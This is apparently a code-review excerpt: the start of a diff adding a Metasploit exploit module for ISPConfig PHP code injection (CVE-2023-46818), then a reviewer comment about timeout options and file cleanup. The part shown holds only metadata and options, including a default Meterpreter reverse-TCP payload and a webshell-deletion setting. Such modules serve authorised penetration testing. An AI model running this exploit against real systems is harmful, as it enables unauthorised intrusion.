modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,237 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ISPConfig language_edit.php PHP Code Injection',
+        'Description' => %q{
+          An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'syfi' # Discovery and PoC
+        ],
+        'References' => [
+          ['CVE', '2023-46818'],
+          ['URL', 'https://github.com/SyFi/CVE-2023-46818'],
+          ['URL', 'https://karmainsecurity.com/KIS-2023-13'],
+          ['URL', 'https://karmainsecurity.com/pocs/CVE-2023-46818.php']
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'Automatic PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2023-10-24',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to ISPConfig', '/']),
+      OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
+      OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
+      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
+    ])
```

Comment:
`LOGIN_TIMEOUT` should be replaced with `HttpClientTimeout` which is builtin and once the PHP payload is dropped instead of the shell, it makes sense to always delete the file and perform the clean up.

```suggestion
```